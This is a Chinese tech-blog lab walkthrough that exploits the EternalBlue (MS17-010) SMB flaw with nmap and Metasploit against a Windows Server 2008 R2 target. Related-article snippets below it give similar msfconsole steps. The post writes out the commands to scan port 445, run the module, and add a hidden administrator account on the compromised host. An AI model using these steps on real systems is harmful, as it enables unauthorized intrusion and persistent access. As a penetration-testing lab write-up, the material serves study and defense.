永恒之蓝漏洞发现与利用

最新推荐文章于 2024-05-03 02:58:08 发布
最新推荐文章于 2024-05-03 02:58:08 发布
阅读量3.8k 收藏 2
点赞数 7
文章标签: 安全 kali 永恒之蓝
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaogaoxiaoyuan/article/details/121798453
版权

永恒之蓝恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

攻击机:kali linux
靶机:Windows sever2008 r2
kali和靶机要在同一个网段
我们打开kali

nmap -Pn(目标ip) 扫描目标端口开启情况,主要目标445
在这里插入图片描述
msfconsole 打开攻击软件
在这里插入图片描述
search ms17-010 查看漏洞利用模块
在这里插入图片描述
use 0(一共四个模块,第一个是扫描模块) 打开扫描模块

show options 打开目标设置界面,设置RHOSTS目标IP地址
在这里插入图片描述
set rhosts (目标ip) 设置目标IP地址 也是windows server2008 r2的ip
在这里插入图片描述
run 运行漏洞
在这里插入图片描述
net user king9 2000666zli. /add [在目标主机上创建一个名为king9的账户,密码 2000666zli.
在这里插入图片描述
目标主机被创建账户

因为是创建的用户 所有没有管理员权限,我们给他进行提权
kali下对win7提权

net localgroup administrators 账户名/add

然后我们登陆windows server2008r2
在这里插入图片描述

boboaiwanshua
关注
学习笔记 vm虚拟机模拟实战打靶(永恒之蓝)
qq_52360932的博客
12-17 5016
1、查看靶机的ip地址:(即信息收集获取靶机ip,这里我直接在靶机内查看了ip地址,实际上应该进行信息收集获取ip) 2、返回启动kali,进入root,输入netdiscover(这一步是为了查看是否可以搜索到靶机ip) 3、发现靶机后,nmap扫描靶机,发现存在445端口(本人刚学习,使用永恒之蓝进行渗透) nmap -sV -O -A -T4 192.168.108.137 -sV版本识别 -O 是系统识别 -A 是进攻性扫描 -T4 是 以4级的速度扫描 4、启...
永恒之蓝漏洞原理及利用
热门推荐
qq_41679358的博客
08-16 2万+
本文转自行云博客https://www.xy586.top/ 文章目录摘要前提需要原理漏洞利用 摘要 什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通.
永恒之蓝复现
weixin_45116657的博客
08-16 806
一、实验环境: kali攻击机—IP地址:192.168.85.156 Win 2008靶机—IP地址:192.168.85.152 二、实验过程: 1、扫描靶机,查看445端口是否开放; 2、复现 2.1> 在kali中打开METASPLOIT 打开控制平台:msfconsole平台 2.2> 在msfconsole平台上搜索ms17-010相关模块; search ms17-...
MSF渗透测试
weixin_51646864的博客
08-12 1191
MSF入门实验
Metasploit framework
qq_49091880的博客
01-27 632
工具:the Metasploit framework 1.启动命令:msfconsole 一些参数解释: (1)exploit:是代表利用漏洞进行攻击动作的模块 (2)auciliary:负责执行信息收集、扫描、嗅探 (3)post:后渗透模块 2.搜索命令 (1)例如:search ms17-010(搜索ms17-010漏洞模块) 查看是否存在这个漏洞 命令:set rhosts 目标主机IP地址 3.以ms17-010的第三个模块为例(永恒之蓝) 命令:use 3(利用永恒之蓝模块) 命令:info(
msf rhosts设置文件_msf之CVE20190708Bluekeep漏洞利用模块
weixin_39625864的博客
11-28 489
msf之CVE-2019-0708-Bluekeep漏洞利用模块漏洞介绍2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用利用漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年Wan...
Windows 2008永恒之蓝漏洞利用与后渗透测试详解
最新发布
09-23
具体涉及nmap命令实施的端口和服务枚举以及利用永恒之蓝漏洞(MS17-010 EternalBlue)取得目标主机管理访问,最终展示了在已攻破的目标环境中进一步行动的步骤和技术手段。适用于希望了解Windows操作系统特定远程...
MS1710永恒之蓝漏洞利用
07-07
MS1710永恒之蓝漏洞利用
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验
2401_84297796的博客
05-03 1388
6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
msf rhosts设置文件_利用MSF检测CVE20190708漏洞
weixin_39737224的博客
11-28 590
CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。GitHub项目:https://github.com/zerosum0x0/CVE-2019-0708MSF模块:ht...
MSF之ms17-010永恒之蓝漏洞利用
极光时流
11-26 1万+
MSF之ms17-010永恒之蓝漏洞利用准备扫描漏洞漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali系统,其IP为:192.168.207.130 攻击工具:kali自带的msfconsole工具 扫描漏洞kali终端中输入msfconsole use auxiliary/scanner/smb/s...
Metasploit 整理笔记
不急不躁
07-12 1万+
一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,bind shell 绑定一个执行命令的通道至测试者的机器。payload 也可以是只 能在目标机器上
Kali Linux渗透测试 143 Mestasploit 信息收集
kevinhanser
04-19 1687
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 模块位置: 信息收集的模块都在 auxiliary/scanner/ 之下msf > use auxiliary/scanner/ [TAB] Display all 531 possibilities? (
【Metasploit总结】之【MSF常用命令及信息收集】
AA8j的博客
12-10 3962
初识MSF smfconsole常用命令 msfconsole下可以直接使用终端命令,如ping等 msfdb start # 启动msf数据库,msf数据库是使用的postgresql的5432端口,新版本的postgresql是5433无法使用,需要到/etc/postgresql/13/main/postgresql.conf下修改为5432端口 msfconsole -q # 启动msfconsole(-q为安静启动) db_status # 查看数据库状态,若显示no connect,先exit
msf rhosts设置文件_msf系列之大牛黑客必须学的控制台命令
weixin_39825322的博客
11-06 1030
1、 Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集...
渗透测试之踩点篇
自学编程_youkewang.top
02-15 4587
网络踩点犹如躲在暗处的狙击手,只观察情况而不进行射击,有 踩点的以下途径: 1:通过搜索引擎进行信息收集 1.1:google Hacking技术 搜索工具. 1:SiteDigger 2:Search Diggity (此款软件还支持对源代码、恶意软件等进行分析)   1.2:探索网站的目录结构 1:常见的后台管理目录:admin、login、cms 通过google来
羽翼metasploit第一,二季学习笔记
weixin_30379911的博客
03-07 378
-----------------第一季-------------------- 启动Metasploit:msfconsole 升级和更新:./msfupdate 直接退出:exit 退回上一级:quit1.端口扫描: a.调用Nmap扫描 nmap -v -sV ip b.调用msf模块扫描(1) use auxiliary/scanner/portsca...
搞死虚拟机-永恒之蓝和shift后门
shy的博客
07-30 941
扫描端口:发现开启了445端口可能存在永恒之蓝(ms17_010)漏洞 nmap -sV -p- -A -v 192.168.206.129 开启msf msfconsole 搜素 search ms17_010 使用msf验证脚本,验证是否存在ms17_010 use auxiliary/scanner/smb/smb_ms17_010 show options 配置验证脚本 set RHOSTS 192.168.206.129 运行 run 显示存在ms17_010漏洞 .
Kali Linux演示永恒之蓝漏洞攻击Windows 7
永恒之蓝漏洞演示是一份针对Windows系统的安全技术实践教程,使用Kali Linux作为攻击工具平台,针对MS17_010 Eternal Blue漏洞进行演示。永恒之蓝漏洞(MS17-010)是2017年4月被公开的Windows系统中的一个严重安全...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值